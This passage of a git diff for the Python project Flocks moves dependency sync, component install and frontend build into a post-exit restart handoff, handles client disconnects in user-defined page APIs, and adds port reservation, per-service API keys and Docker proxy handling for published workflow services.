@@ -572,14 +534,95 @@ def _dependency_sync_timeout_seconds() -> int:
 
 def _build_dependency_sync_command(uv_path: str, *, uv_default_index: str | None = None) -> list[str]:
     """Build the ``uv sync`` command used by the self-updater."""
-    cmd = [uv_path, "sync"]
-    if sys.platform == "win32":
-        cmd.append("--no-install-project")
+    cmd = [uv_path, "sync", "--frozen", "--no-python-downloads"]
     if uv_default_index:
         cmd.extend(["--default-index", uv_default_index])
     return cmd
 
 
+async def _sync_project_dependencies(
+    *,
+    uv_path: str,
+    install_root: Path,
+    uv_default_index: str | None = None,
+    sync_timeout: int | None = None,
+    env: dict[str, str] | None = None,
+) -> str | None:
+    """Synchronize backend dependencies in the active project environment.
+
+    Returns ``None`` on success, or an error message on timeout or persistent failure.
+    """
+    effective_timeout = sync_timeout or _dependency_sync_timeout_seconds()
+    uv_cmd = _build_dependency_sync_command(uv_path, uv_default_index=uv_default_index)
+    log.info("updater.dependencies.sync", {"tool": "uv sync", "path": uv_path})
+
+    async def _run_uv_sync(cmd: list[str]) -> tuple[int, str, str]:
+        return await _run_async(
+            cmd,
+            cwd=install_root,
+            timeout=effective_timeout,
+            env=env,
+        )
+
+    def _timeout_message() -> str:
+        return f"Dependency sync timed out after {effective_timeout}s while running uv sync."
+
+    try:
+        code, _, err = await _run_uv_sync(uv_cmd)
+    except subprocess.TimeoutExpired:
+        return _timeout_message()
+
+    if (
+        code != 0
+        and sys.platform == "win32"
+        and _is_uv_managed_python_runtime_error(err)
+    ):
+        repaired_dir = await asyncio.to_thread(_repair_windows_uv_managed_python_install, err)
+        if repaired_dir is not None:
+            log.warning(
+                "updater.dependencies.sync_repair_uv_python",
+                {"path": str(repaired_dir)},
+            )
+        else:
+            log.warning(
+                "updater.dependencies.sync_repair_uv_python_missing_path",
+                {"error": err},
+            )
+        await asyncio.sleep(2)
+        try:
+            code, _, err = await _run_uv_sync(uv_cmd)
+        except subprocess.TimeoutExpired:
+            return _timeout_message()
+
+    if code != 0 and uv_default_index:
+        log.warning(
+            "updater.dependencies.sync_retry_default_index",
+            {
+                "first_error": err,
+                "default_index": uv_default_index,
+            },
+        )
+        await asyncio.sleep(3)
+        uv_cmd = _build_dependency_sync_command(uv_path)
+        try:
+            code, _, err = await _run_uv_sync(uv_cmd)
+        except subprocess.TimeoutExpired:
+            return _timeout_message()
+
+    if code != 0:
+        log.warning("updater.dependencies.sync_retry", {"first_error": err})
+        await asyncio.sleep(3)
+        try:
+            code, _, err = await _run_uv_sync(uv_cmd)
+        except subprocess.TimeoutExpired:
+            return _timeout_message()
+
+    if code != 0:
+        return f"Dependency sync failed: {err}"
+
+    return None
+
+
 # ------------------------------------------------------------------ #
 # Async subprocess helpers
 # ------------------------------------------------------------------ #
@@ -1666,6 +1709,70 @@ async def _restore_pro_component_snapshot(
     return None
 
 
+async def run_handoff_upgrade_tasks(
+    *,
+    install_root: Path,
+    uv_path: str,
+    version: str,
+    uv_default_index: str | None = None,
+    npm_registry: str | None = None,
+    pro_wheel_path: Path | None = None,
+    pro_bundle_manifest_path: Path | None = None,
+    bundle_sha256: str | None = None,
+    sync_timeout: int | None = None,
+) -> str | None:
+    """Run upgrade work that must happen after the old service exits; return an error message or None."""
+    sync_env = _build_uv_sync_env()
+    sync_error = await _sync_project_dependencies(
+        uv_path=uv_path,
+        install_root=install_root,
+        uv_default_index=uv_default_index,
+        sync_timeout=sync_timeout,
+        env=sync_env,
+    )
+    if sync_error is not None:
+        return sync_error
+
+    if pro_wheel_path is not None:
+        python_path = _venv_python_path(install_root)
+        install_cmd = [uv_path, "pip", "install", "--python", str(python_path), "--no-deps", str(pro_wheel_path)]
+        # A timed-out install raises TimeoutExpired; report it as an error string, as
+        # the dependency sync does, so callers take their normal failure path.
+        try:
+            code, _, err = await _run_async(install_cmd, cwd=install_root, timeout=180, env=sync_env)
+        except subprocess.TimeoutExpired:
+            return "Flocks Pro component install timed out after 180s."
+        if code != 0:
+            return f"Flocks Pro component install failed: {err}"
+
+    validation_error = await _validate_restart_runtime(install_root)
+    if validation_error:
+        return validation_error
+
+    install_webui_dir = install_root / "webui"
+    if install_webui_dir.is_dir() and (install_webui_dir / "package.json").exists():
+        frontend_error = await _build_frontend_workspace(
+            install_webui_dir,
+            npm_registry=npm_registry,
+        )
+        if frontend_error is not None:
+            return frontend_error
+
+    _write_version_marker(version.lstrip("v"))
+    if pro_bundle_manifest_path is not None and pro_bundle_manifest_path.is_file():
+        _write_pro_bundle_install_marker(
+            _load_json_file(pro_bundle_manifest_path),
+            bundle_sha256=bundle_sha256,
+        )
+
+    try:
+        _refresh_global_cli_entry(install_root)
+    except Exception as exc:
+        log.warning("updater.refresh_cli.failed", {"error": str(exc)})
+
+    return None
+
+
 def _write_pro_bundle_install_marker(manifest: dict[str, Any], *, bundle_sha256: str | None = None) -> None:
     marker = _flocks_root() / "run" / "pro-bundle-installed.json"
     marker.parent.mkdir(parents=True, exist_ok=True)
@@ -1700,35 +1807,6 @@ def _current_service_config():
     )
 
 
-def _build_service_restart_argv(install_root: Path | None = None) -> list[str]:
-    repo_root = install_root or _get_repo_root()
-    if sys.platform == "win32":
-        venv_python = repo_root / ".venv" / "Scripts" / "python.exe"
-    else:
-        venv_python = repo_root / ".venv" / "bin" / "python"
-
-    if not venv_python.exists():
-        raise FileNotFoundError(f"Restart runtime is missing: {venv_python}")
-
-    config = _current_service_config()
-    return [
-        str(venv_python),
-        "-m",
-        "flocks.cli.main",
-        "restart",
-        "--no-browser",
-        "--skip-webui-build",
-        "--server-host",
-        str(config.backend_host),
-        "--server-port",
-        str(config.backend_port),
-        "--webui-host",
-        str(config.frontend_host),
-        "--webui-port",
-        str(config.frontend_port),
-    ]
-
-
 def _spawn_detached_process(
     command: list[str],
     *,
@@ -2198,7 +2276,11 @@ def rollback_upgrade_handover() -> None:
 def cleanup_replaced_files(root: Path | None = None) -> None:
     install_root = root or _get_repo_root()
     leftovers = sorted(
-        (path for path in install_root.rglob("*") if ".flocks_old_" in path.name),
+        (
+            path
+            for path in install_root.rglob("*")
+            if ".flocks_old_" in path.name
+        ),
         key=lambda path: len(path.parts),
         reverse=True,
     )
@@ -2655,9 +2737,6 @@ async def perform_update(
     install_root = _get_repo_root()
     current_version = get_current_version()
     handover_active = False
-    pro_bundle_marker_manifest: dict[str, Any] | None = None
-    pro_component_snapshot: _ProComponentSnapshot | None = None
-
     console_manifest_info: ConsoleManifestRelease | None = None
     fmt = _choose_archive_format(ucfg.archive_format)
     if profile.sources == ["console-manifest"]:
@@ -2882,9 +2961,9 @@ async def _restore_after_apply_failure() -> None:
             return
 
     # ------------------------------------------------------------------ #
-    # Step 5 – sync dependencies
+    # Step 5 – prepare dependency sync
     # ------------------------------------------------------------------ #
-    yield UpdateProgress(stage="syncing", message="Syncing dependencies...")
+    yield UpdateProgress(stage="syncing", message="Preparing dependency sync...")
 
     uv_path = _find_executable("uv")
     if not uv_path:
@@ -2901,167 +2980,43 @@ async def _restore_after_apply_failure() -> None:
         yield UpdateProgress(stage="error", message=hint, success=False)
         return
 
-    log.info("updater.dependencies.sync", {"tool": "uv sync", "path": uv_path})
-    uv_cmd = _build_dependency_sync_command(uv_path, uv_default_index=profile.uv_default_index)
-
-    sync_env = _build_uv_sync_env()
     sync_timeout = _dependency_sync_timeout_seconds()
-    retried_after_managed_python_repair = False
-
-    async def _run_uv_sync(cmd: list[str]) -> tuple[int, str, str]:
-        return await _run_async(
-            cmd,
-            cwd=install_root,
-            timeout=sync_timeout,
-            env=sync_env,
+    pro_bundle_manifest_path: Path | None = None
+    if pro_bundle_manifest:
+        pro_bundle_manifest_path = tmp_dir / "pro-bundle-marker.json"
+        pro_bundle_manifest_path.write_text(
+            json.dumps(pro_bundle_manifest, ensure_ascii=True, sort_keys=True),
+            encoding="utf-8",
         )
 
-    def _dependency_sync_timeout_message() -> str:
-        return f"Dependency sync timed out after {sync_timeout}s while running uv sync."
-
-    try:
-        code, _, err = await _run_uv_sync(uv_cmd)
-    except subprocess.TimeoutExpired:
-        shutil.rmtree(tmp_dir, ignore_errors=True)
-        await _restore_after_apply_failure()
-        timeout_message = _dependency_sync_timeout_message()
-        _record_update_journal(f"ERROR {timeout_message}")
-        yield UpdateProgress(stage="error", message=timeout_message, success=False)
-        return
-    if (
-        code != 0
-        and sys.platform == "win32"
-        and not retried_after_managed_python_repair
-        and _is_uv_managed_python_runtime_error(err)
-    ):
-        retried_after_managed_python_repair = True
-        repaired_dir = await asyncio.to_thread(_repair_windows_uv_managed_python_install, err)
-        if repaired_dir is not None:
-            log.warning(
-                "updater.dependencies.sync_repair_uv_python",
-                {"path": str(repaired_dir)},
-            )
-        else:
-            log.warning(
-                "updater.dependencies.sync_repair_uv_python_missing_path",
-                {"error": err},
-            )
-        await asyncio.sleep(2)
-        try:
-            code, _, err = await _run_uv_sync(uv_cmd)
-        except subprocess.TimeoutExpired:
-            shutil.rmtree(tmp_dir, ignore_errors=True)
-            await _restore_after_apply_failure()
-            timeout_message = _dependency_sync_timeout_message()
-            _record_update_journal(f"ERROR {timeout_message}")
-            yield UpdateProgress(stage="error", message=timeout_message, success=False)
-            return
-    if code != 0 and profile.uv_default_index:
-        log.warning(
-            "updater.dependencies.sync_retry_default_index",
-            {
-                "first_error": err,
-                "default_index": profile.uv_default_index,
-            },
+    # ------------------------------------------------------------------ #
+    # Step 6 – run post-apply tasks or restart via handoff
+    #
+    # With restart=True, dependency sync, Pro install, frontend build, marker
+    # writes, and CLI refresh happen in restart_handoff after the old backend
+    # exits. This avoids mutating the active Python environment while the old
+    # service is still running.
+    # ------------------------------------------------------------------ #
+    if not restart:
+        task_error = await run_handoff_upgrade_tasks(
+            install_root=install_root,
+            uv_path=uv_path,
+            version=latest_tag,
+            uv_default_index=profile.uv_default_index,
+            npm_registry=profile.npm_registry,
+            pro_wheel_path=pro_wheel_path,
+            pro_bundle_manifest_path=pro_bundle_manifest_path,
+            bundle_sha256=bundle_sha256,
+            sync_timeout=sync_timeout,
         )
-        await asyncio.sleep(3)
-        uv_cmd = _build_dependency_sync_command(uv_path)
-        try:
-            code, _, err = await _run_uv_sync(uv_cmd)
-        except subprocess.TimeoutExpired:
-            shutil.rmtree(tmp_dir, ignore_errors=True)
-            await _restore_after_apply_failure()
-            timeout_message = _dependency_sync_timeout_message()
-            _record_update_journal(f"ERROR {timeout_message}")
-            yield UpdateProgress(stage="error", message=timeout_message, success=False)
-            return
-    if code != 0:
-        log.warning("updater.dependencies.sync_retry", {"first_error": err})
-        await asyncio.sleep(3)
-        try:
-            code, _, err = await _run_uv_sync(uv_cmd)
-        except subprocess.TimeoutExpired:
+        if task_error is not None:
             shutil.rmtree(tmp_dir, ignore_errors=True)
             await _restore_after_apply_failure()
-            timeout_message = _dependency_sync_timeout_message()
-            _record_update_journal(f"ERROR {timeout_message}")
-            yield UpdateProgress(stage="error", message=timeout_message, success=False)
+            _record_update_journal(f"ERROR {task_error}")
+            yield UpdateProgress(stage="error", message=task_error, success=False)
             return
 
-    if code != 0:
         shutil.rmtree(tmp_dir, ignore_errors=True)
-        await _restore_after_apply_failure()
-        yield UpdateProgress(stage="error", message=f"Dependency sync failed: {err}", success=False)
-        return
-
-    if pro_wheel_path is not None:
-        yield UpdateProgress(
-            stage="syncing",
-            message="Installing Flocks Pro component...",
-            pro_component_filename=pro_wheel_path.name,
-        )
-        python_path = _venv_python_path(install_root)
-        install_cmd = [uv_path, "pip", "install", "--python", str(python_path), "--no-deps", str(pro_wheel_path)]
-        pro_component_snapshot = await _snapshot_pro_component(install_root)
-        code, _, err = await _run_async(
-            install_cmd,
-            cwd=install_root,
-            timeout=180,
-            env=sync_env,
-        )
-        if code != 0:
-            shutil.rmtree(tmp_dir, ignore_errors=True)
-            await _restore_after_apply_failure()
-            restore_error = await _restore_pro_component_snapshot(
-                pro_component_snapshot,
-                uv_path=uv_path,
-                install_root=install_root,
-                env=sync_env,
-            )
-            message = f"Flocks Pro component install failed: {err}"
-            if restore_error:
-                message = f"{message}\n{restore_error}"
-            yield UpdateProgress(stage="error", message=message, success=False)
-            return
-        if pro_bundle_manifest:
-            pro_bundle_marker_manifest = pro_bundle_manifest
-
-    if sys.platform == "win32":
-        validation_error = await _validate_windows_restart_runtime(install_root)
-        if validation_error:
-            shutil.rmtree(tmp_dir, ignore_errors=True)
-            await _restore_after_apply_failure()
-            if pro_component_snapshot is not None:
-                await _restore_pro_component_snapshot(
-                    pro_component_snapshot,
-                    uv_path=uv_path,
-                    install_root=install_root,
-                    env=sync_env,
-                )
-            yield UpdateProgress(stage="error", message=validation_error, success=False)
-            return
-
-    shutil.rmtree(tmp_dir, ignore_errors=True)
-    _write_version_marker(latest_tag.lstrip("v"))
-    if pro_bundle_marker_manifest:
-        _write_pro_bundle_install_marker(pro_bundle_marker_manifest, bundle_sha256=bundle_sha256)
-
-    try:
-        _refresh_global_cli_entry(install_root)
-    except Exception as exc:
-        log.warning("updater.refresh_cli.failed", {"error": str(exc)})
-
-    # ------------------------------------------------------------------ #
-    # Step 6 – restart in-place (skipped when restart=False, e.g. CLI)
-    # Send the "restarting" event while the proxy is still alive, then
-    # perform the handover, rebuild the frontend in the active install tree,
-    # and finally restart the service.
-    #
-    # CRITICAL: once handover starts we ignore client-disconnect cancellation
-    # until the build/restart sequence finishes, so the temporary upgrade page
-    # is not left behind half-way through cutover.
-    # ------------------------------------------------------------------ #
-    if not restart:
         log.info("updater.apply.done", {"version": latest_tag, "restart": False, "region": profile.region})
         yield UpdateProgress(
             stage="done",
@@ -3118,63 +3073,38 @@ def _dependency_sync_timeout_message() -> str:
             )
             return
 
-    install_webui_dir = install_root / "webui"
-    if install_webui_dir.is_dir() and (install_webui_dir / "package.json").exists():
-        if not handover_active:
-            frontend_error = "Refusing to rebuild frontend before WebUI handover completes."
-            _record_update_journal(f"ERROR {frontend_error}")
-            await _restore_after_apply_failure()
-            yield UpdateProgress(
-                stage="error",
-                message=frontend_error,
-                success=False,
-            )
-            return
-        frontend_error = await _await_ignoring_cancellation(
-            _build_frontend_workspace(
-                install_webui_dir,
-                npm_registry=profile.npm_registry,
-            )
-        )
-        if frontend_error is not None:
-            _record_update_journal(f"ERROR {frontend_error}")
-            await _await_ignoring_cancellation(_restore_after_apply_failure())
-            yield UpdateProgress(
-                stage="error",
-                message=frontend_error,
-                success=False,
-            )
-            return
-
-    if sys.platform == "win32":
-        log.info("updater.restart.spawn", {"argv": restart_argv})
-        try:
-            subprocess.Popen(
-                restart_argv,
-                cwd=install_root,
-                close_fds=True,
-            )
-            os._exit(0)
-        except OSError as exc:
-            log.error("updater.restart.spawn_failed", {"error": str(exc)})
-            if handover_active:
-                try:
-                    rollback_upgrade_handover()
-                except Exception:
-                    pass
-                handover_active = False
-            yield UpdateProgress(
-                stage="error",
-                message=f"Failed to restart service: {exc}",
-                success=False,
-            )
-            return
-
-    log.info("updater.restart.execv", {"argv": restart_argv})
     try:
-        os.execv(restart_argv[0], restart_argv)
-    except OSError as exc:
-        log.error("updater.restart.execv_failed", {"error": str(exc)})
+        handoff_argv = _build_restart_handoff_argv(
+            restart_argv,
+            install_root,
+            uv_path=uv_path,
+            sync_timeout=sync_timeout,
+            version=latest_tag,
+            current_version=current_version,
+            backup_path=backup_path,
+            uv_default_index=profile.uv_default_index,
+            npm_registry=profile.npm_registry,
+            pro_wheel_path=pro_wheel_path,
+            pro_bundle_manifest_path=pro_bundle_manifest_path,
+            bundle_sha256=bundle_sha256,
+            cleanup_dir=tmp_dir,
+        )
+        log.info(
+            "updater.restart.handoff_spawn",
+            {
+                "argv": handoff_argv,
+                "restart_argv": restart_argv,
+            },
+        )
+        subprocess.Popen(
+            handoff_argv,
+            cwd=install_root,
+            close_fds=True,
+        )
+        os._exit(0)
+    except Exception as exc:
+        log.error("updater.restart.handoff_spawn_failed", {"error": str(exc)})
+        shutil.rmtree(tmp_dir, ignore_errors=True)
         if handover_active:
             try:
                 rollback_upgrade_handover()
@@ -3252,7 +3182,7 @@ def _refresh_global_cli_entry(install_root: Path) -> None:
 
 
 def _build_restart_argv(install_root: Path | None = None) -> list[str]:
-    """Reconstruct the argv for ``os.execv`` so the process restarts correctly.
+    """Reconstruct the argv used by restart handoff to restart correctly.
 
     Always uses the project ``.venv`` Python to ensure the restarted process
     runs in the same environment that ``uv sync`` just updated.
@@ -3286,6 +3216,75 @@ def _build_restart_argv(install_root: Path | None = None) -> list[str]:
     return [str(venv_python), "-m", "flocks.cli.main"] + clean_rest
 
 
+def _build_restart_handoff_argv(
+    restart_argv: list[str],
+    install_root: Path,
+    *,
+    uv_path: str,
+    sync_timeout: int,
+    version: str,
+    current_version: str,
+    backup_path: Path | None = None,
+    uv_default_index: str | None = None,
+    npm_registry: str | None = None,
+    pro_wheel_path: Path | None = None,
+    pro_bundle_manifest_path: Path | None = None,
+    bundle_sha256: str | None = None,
+    cleanup_dir: Path | None = None,
+) -> list[str]:
+    """Wrap the real restart command in a helper that finishes upgrade work."""
+    from flocks.cli import service_manager
+
+    if not restart_argv:
+        raise ValueError("restart command is empty")
+
+    config = _current_service_config()
+    paths = service_manager.ensure_runtime_dirs()
+    argv = [
+        restart_argv[0],
+        "-m",
+        "flocks.updater.restart_handoff",
+        "--parent-pid",
+        str(os.getpid()),
+        "--backend-host",
+        str(config.backend_host),
+        "--backend-port",
+        str(config.backend_port),
+        "--frontend-host",
+        str(config.frontend_host),
+        "--frontend-port",
+        str(config.frontend_port),
+        "--backend-pid-file",
+        str(paths.backend_pid),
+        "--install-root",
+        str(install_root),
+        "--uv-path",
+        uv_path,
+        "--sync-timeout",
+        str(sync_timeout),
+        "--version",
+        version,
+        "--current-version",
+        current_version,
+    ]
+    if backup_path is not None:
+        argv.extend(["--backup-path", str(backup_path)])
+    if uv_default_index:
+        argv.extend(["--uv-default-index", uv_default_index])
+    if npm_registry:
+        argv.extend(["--npm-registry", npm_registry])
+    if pro_wheel_path is not None:
+        argv.extend(["--pro-wheel-path", str(pro_wheel_path)])
+    if pro_bundle_manifest_path is not None:
+        argv.extend(["--pro-bundle-manifest-path", str(pro_bundle_manifest_path)])
+    if bundle_sha256:
+        argv.extend(["--bundle-sha256", bundle_sha256])
+    if cleanup_dir is not None:
+        argv.extend(["--cleanup-dir", str(cleanup_dir)])
+    argv.extend(["--", *restart_argv])
+    return argv
+
+
 def _resolve_windows_restart_command(argv0: str, orig_argv: list[str]) -> list[str] | None:
     """Recover the Windows launcher plus script or ``-m`` invocation from ``orig_argv``."""
     if not orig_argv:
diff --git a/flocks/user_defined_pages/api_runtime.py b/flocks/user_defined_pages/api_runtime.py
index e009a1359..0b04b60cd 100644
--- a/flocks/user_defined_pages/api_runtime.py
+++ b/flocks/user_defined_pages/api_runtime.py
@@ -18,6 +18,7 @@
 import yaml
 from fastapi import HTTPException, Request, status
 from fastapi.responses import JSONResponse, Response
+from starlette.requests import ClientDisconnect
 
 from flocks.user_defined_pages.models import UserDefinedPageApiMeta
 from flocks.user_defined_pages.store import UserDefinedPagesStore
@@ -30,6 +31,7 @@
 _MAX_TIMEOUT_MS = 30000
 _MAX_RESPONSE_BYTES = 2_000_000
 _MAX_REQUEST_BODY_BYTES = 1_000_000
+_CLIENT_CLOSED_REQUEST_STATUS = 499
 _STDLIB_DIR = Path(sysconfig.get_paths()["stdlib"]).resolve()
 
 
@@ -98,7 +100,14 @@ async def dispatch(self, page_id: str, api_path: str, request: Request, user: An
         page_id = self._store.validate_page_id(page_id)
         if not self._store.page_dir(page_id).is_dir():
             raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f"page not found: {page_id}")
-        await self._guard_request_size(request)
+        try:
+            await self._guard_request_size(request)
+        except ClientDisconnect:
+            log.info(
+                "user_defined_pages.api.client_disconnected",
+                {"pageId": page_id, "method": request.method, "path": request.url.path},
+            )
+            return Response(status_code=_CLIENT_CLOSED_REQUEST_STATUS)
 
         runtime = await self._load_page_runtime(page_id, force_reload=False)
         normalized_path = "/" + api_path.strip("/")
diff --git a/flocks/workflow/center.py b/flocks/workflow/center.py
index 0f7393eb1..b286e2677 100644
--- a/flocks/workflow/center.py
+++ b/flocks/workflow/center.py
@@ -19,6 +19,7 @@
 import uuid
 from pathlib import Path
 from typing import Any, Dict, List, Optional
+from urllib.parse import urlparse, urlunparse
 from urllib import error as url_error
 from urllib import request as url_request
 
@@ -28,12 +29,15 @@
 from flocks.storage.storage import Storage
 from flocks.utils.log import Log
 from flocks.workflow.models import Workflow
+from flocks.workflow.requirements import resolve_python_package_index_url
+from flocks.workflow.visibility import is_hidden_workflow
 
 log = Log.create(service="workflow.center")
 
 _REGISTRY_PREFIX = "workflow_registry/"
 _RELEASE_PREFIX = "workflow_release/"
 _RUNTIME_PREFIX = "workflow_runtime/"
+_API_SERVICE_PREFIX = "workflow_api_service/"
 _SERVICE_DATA_DIR = "workflow-services"
 _DEFAULT_PORT_START = 19000
 _DEFAULT_PORT_END = 19999
@@ -44,9 +48,13 @@
 _DEFAULT_RUNTIME_INSTALL_HEALTH_RETRIES = 450  # 450 × 2s = 15 minutes
 _DEFAULT_STOP_TIMEOUT_S = 15.0
 _DEFAULT_LOCAL_STOP_GRACE_S = 5.0
+_SERVICE_API_KEY_ENV = "FLOCKS_WORKFLOW_SERVICE_API_KEY"
+_PORT_RESERVATION_TTL_S = 30 * 60
 
 # Service driver: "local" runs as a subprocess; "docker" runs in a container.
 _DEFAULT_SERVICE_DRIVER = "local"
+_PORT_ALLOCATION_LOCK = asyncio.Lock()
+_IN_FLIGHT_PORT_RESERVATIONS: Dict[int, float] = {}
 
 
 class WorkflowCenterError(Exception):
@@ -100,6 +108,17 @@ def _fingerprint(path: Path) -> str:
     return digest.hexdigest()
 
 
+def _generate_api_key() -> str:
+    return uuid.uuid4().hex + uuid.uuid4().hex
+
+
+def _workflow_service_auth_headers(runtime: Dict[str, Any]) -> Optional[Dict[str, str]]:
+    api_key = runtime.get("apiKey")
+    if not api_key:
+        return None
+    return {"x-api-key": str(api_key)}
+
+
 GLOBAL_WORKFLOW_ROOT: Path = Path.home() / ".flocks" / "workflow"
 
 
@@ -153,14 +172,84 @@ def _is_port_available(port: int) -> bool:
             return False
 
 
+def _port_from_service_url(value: Any) -> Optional[int]:
+    if not value:
+        return None
+    try:
+        parsed = urlparse(str(value))
+        return parsed.port
+    except (TypeError, ValueError):
+        return None
+
+
+def _ports_from_service_record(record: Any) -> set[int]:
+    if not isinstance(record, dict):
+        return set()
+
+    ports: set[int] = set()
+    for key in ("hostPort", "port"):
+        try:
+            port = int(record.get(key) or 0)
+        except (TypeError, ValueError):
+            port = 0
+        if 1 <= port <= 65535:
+            ports.add(port)
+
+    for key in ("serviceUrl", "invokeUrl"):
+        port = _port_from_service_url(record.get(key))
+        if port is not None:
+            ports.add(port)
+    return ports
+
+
+async def _reserved_service_ports() -> set[int]:
+    ports: set[int] = set()
+    for prefix in (_RUNTIME_PREFIX, _API_SERVICE_PREFIX, _REGISTRY_PREFIX):
+        try:
+            keys = await Storage.list_keys(prefix)
+        except Exception as exc:
+            log.warning("workflow.port.list_reserved_failed", {"prefix": prefix, "error": str(exc)})
+            continue
+
+        for key in keys:
+            try:
+                record = await Storage.read(key)
+            except Exception as exc:
+                log.warning("workflow.port.read_reserved_failed", {"key": _key_to_string(key), "error": str(exc)})
+                continue
+            ports.update(_ports_from_service_record(record))
+    return ports
+
+
+def _reserved_in_flight_ports() -> set[int]:
+    now = time.time()
+    expired = [
+        port
+        for port, expires_at in _IN_FLIGHT_PORT_RESERVATIONS.items()
+        if expires_at <= now
+    ]
+    for port in expired:
+        _IN_FLIGHT_PORT_RESERVATIONS.pop(port, None)
+    return set(_IN_FLIGHT_PORT_RESERVATIONS)
+
+
+def _release_port_reservation(port: Optional[int]) -> None:
+    if port is not None:
+        _IN_FLIGHT_PORT_RESERVATIONS.pop(port, None)
+
+
 async def _allocate_port() -> int:
     start = int(os.getenv("FLOCKS_WORKFLOW_SERVICE_PORT_START", str(_DEFAULT_PORT_START)))
     end = int(os.getenv("FLOCKS_WORKFLOW_SERVICE_PORT_END", str(_DEFAULT_PORT_END)))
     if start > end:
         raise WorkflowCenterError("Invalid workflow service port range")
-    for port in range(start, end + 1):
-        if _is_port_available(port):
-            return port
+    async with _PORT_ALLOCATION_LOCK:
+        reserved_ports = await _reserved_service_ports()
+        reserved_ports.update(_reserved_in_flight_ports())
+        for port in range(start, end + 1):
+            if port not in reserved_ports and _is_port_available(port):
+                _IN_FLIGHT_PORT_RESERVATIONS[port] = time.time() + _PORT_RESERVATION_TTL_S
+                return port
     raise WorkflowCenterError("No available workflow service port")
 
 
@@ -186,6 +275,14 @@ async def _scan_workflow_dir(
     for workflow_path in sorted(workflow_root.glob("*/workflow.json")):
         try:
             raw = json.loads(workflow_path.read_text(encoding="utf-8"))
+            meta_path = workflow_path.parent / "meta.json"
+            meta = (
+                json.loads(meta_path.read_text(encoding="utf-8"))
+                if meta_path.is_file()
+                else None
+            )
+            if is_hidden_workflow(raw, meta):
+                continue
             Workflow.from_dict(raw)
         except Exception as exc:
             log.warning(
@@ -303,6 +400,12 @@ def _service_release_file(workflow_id: str, release_id: str) -> Path:
     return base / f"{release_id}.json"
 
 
+def _service_cache_dir(name: str) -> Path:
+    cache_dir = Config.get_data_path() / _SERVICE_DATA_DIR / "cache" / name
+    cache_dir.mkdir(parents=True, exist_ok=True)
+    return cache_dir
+
+
 def _workflow_container_name(workflow_id: str, release_id: str) -> str:
     return f"flocks-wf-{workflow_id[:8]}-{release_id[:8]}"
 
@@ -342,11 +445,19 @@ def _host_service_url(port: int) -> str:
     return f"http://127.0.0.1:{port}"
 
 
-def _json_post(url: str, payload: Dict[str, Any], timeout_s: float = 10.0) -> Dict[str, Any]:
+def _json_post(
+    url: str,
+    payload: Dict[str, Any],
+    timeout_s: float = 10.0,
+    headers: Optional[Dict[str, str]] = None,
+) -> Dict[str, Any]:
+    request_headers = {"Content-Type": "application/json"}
+    if headers:
+        request_headers.update(headers)
     request = url_request.Request(
         url=url,
         data=json.dumps(payload).encode("utf-8"),
-        headers={"Content-Type": "application/json"},
+        headers=request_headers,
         method="POST",
     )
     with url_request.urlopen(request, timeout=timeout_s) as response:
@@ -374,6 +485,91 @@ async def _wait_service_healthy(service_url: str, retries: int = 20, interval_s:
     return False
 
 
+def _docker_proxy_env_value(env_value: str) -> str:
+    """Translate host loopback proxy URLs so containers can reach them."""
+    raw = (env_value or "").strip()
+    if not raw:
+        return env_value
+
+    has_scheme = "://" in raw
+    parse_input = raw if has_scheme else f"http://{raw}"
+    try:
+        parsed = urlparse(parse_input)
+        hostname = (parsed.hostname or "").lower()
+        if hostname not in {"127.0.0.1", "localhost", "::1"}:
+            return env_value
+
+        userinfo = ""
+        if parsed.username:
+            userinfo = parsed.username
+            if parsed.password:
+                userinfo += f":{parsed.password}"
+            userinfo += "@"
+        netloc = f"{userinfo}host.docker.internal"
+        if parsed.port:
+            netloc += f":{parsed.port}"
+        rewritten = urlunparse((
+            parsed.scheme,
+            netloc,
+            parsed.path,
+            parsed.params,
+            parsed.query,
+            parsed.fragment,
+        ))
+        if not has_scheme and rewritten.startswith("http://"):
+            return rewritten[len("http://"):]
+        return rewritten
+    except Exception:
+        return env_value
+
+
+def _docker_proxy_uses_host_gateway(env_value: str) -> bool:
+    raw = (env_value or "").strip()
+    if not raw:
+        return False
+    parse_input = raw if "://" in raw else f"http://{raw}"
+    try:
+        return (urlparse(parse_input).hostname or "").lower() == "host.docker.internal"
+    except Exception:
+        return False
+
+
+async def _docker_logs_tail(container_name: str, *, lines: int = 80) -> str:
+    stdout, stderr, _ = await exec_docker(
+        ["logs", "--tail", str(lines), container_name],
+        allow_failure=True,
+        timeout_s=10,
+    )
+    return (stdout or stderr or "").strip()
+
+
+async def _wait_docker_service_healthy(
+    service_url: str,
+    container_name: str,
+    *,
+    retries: int,
+    interval_s: float,
+) -> bool:
+    for _ in range(retries):
+        try:
+            payload = await asyncio.to_thread(_json_get, f"{service_url}/health", 2.0)
+            if payload.get("ok") is True:
+                return True
+        except Exception:
+            pass
+
+        state = await docker_container_state(container_name)
+        if state.get("exists") and not state.get("running"):
+            logs = await _docker_logs_tail(container_name)
+            detail = logs or "container exited before reporting healthy"
+            raise WorkflowCenterError(
+                "Published workflow service container exited before health check "
+                f"passed: {detail}"
+            )
+        await asyncio.sleep(interval_s)
+    return False
+
+
 async def _stop_and_remove_container(container_name: str) -> bool:
     _, stderr, code = await exec_docker(
         ["rm", "-f", container_name],
@@ -553,7 +749,7 @@ async def _stop_existing_runtime_for_publish(workflow_id: str) -> None:
         await _stop_local_service(workflow_id)
 
 
-async def publish_workflow_local(workflow_id: str) -> Dict[str, Any]:
+async def publish_workflow_local(workflow_id: str, *, api_key: Optional[str] = None) -> Dict[str, Any]:
     """Publish a workflow as a local subprocess using the current Python env.
 
     This is the default driver for development: no Docker, instant startup,
@@ -580,58 +776,75 @@ async def publish_workflow_local(workflow_id: str) -> Dict[str, Any]:
     host_port = await _allocate_port()
     service_url = _host_service_url(host_port)
     service_key = workflow_id
+    runtime_api_key = api_key or _generate_api_key()
 
-    env = os.environ.copy()
-    proc = await asyncio.create_subprocess_exec(
-        sys.executable,
-        "-m", "flocks.workflow.service_runtime",
-        "--workflow", str(release_snapshot_file),
-        "--workflow-id", workflow_id,
-        "--release-id", release_id,
-        "--host", "127.0.0.1",
-        "--port", str(host_port),
-        stdout=asyncio.subprocess.DEVNULL,
-        stderr=asyncio.subprocess.DEVNULL,
-        env=env,
-        start_new_session=True,
-    )
+    proc: asyncio.subprocess.Process | None = None
+    try:
+        env = os.environ.copy()
+        env[_SERVICE_API_KEY_ENV] = runtime_api_key
+        proc = await asyncio.create_subprocess_exec(
